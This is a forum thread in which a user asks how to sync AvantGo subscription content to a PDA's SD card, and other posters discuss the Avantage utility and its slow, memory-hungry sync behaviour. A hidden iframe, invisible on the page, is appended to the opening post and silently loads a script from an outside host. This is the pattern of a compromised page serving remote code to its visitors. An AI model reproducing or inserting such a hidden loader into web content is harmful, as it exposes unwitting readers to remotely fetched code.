+ Reply to Thread

How to sync AvantGo content to SD Card

I've done a search on this board, I've looked through the preferences on the AvantGo software, and I've done a thorough search on the Avantgo website, and NOWHERE can I find information on how to download subscription content to the SD card instead of main memory. I know this must be possible. Can anyone enlighten me?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Don't know the answer but possibly not. Remember that lots of apps (Avantgo) have been around long before PDAs had expansion slots.
    -Quick

I've not used this software but it has been around for some time:
    Avantage

Thank you for that information.

Originally posted by Beryl
    I've not used this software but it has been around for some time:
    Avantage
    I do use it, and I have mixed opinions of it.

Pro:

1) Indeed, it puts everything (including the AvantGo program itself) on the SD card. Saves lots of memory.

Cons:

1) Makes running it very, very slow. It needs to read it off the SD disk in order to run it.

2) Slows down the sync process. It reads everything back to memory, then syncs, and when the sync is over, writes everything back. This creates another point: You need to have that much memory free in order to do the sync. So, if you have 2MB of data, you need 2MB of memory as a staging area for the sync to complete, then it will write the new 2MB back to the card and the memory will be released when the sync finishes.

Great design feature...

So, if you have 2MB of data, you need 2MB of memory as a staging area for the sync to complete, then it will write the new 2MB back to the card and the memory will be released when the sync finishes.
    So when you really need it (like when your ram gets full) it won't work!

Whoever thunk dat one up shouldn't quit his day job!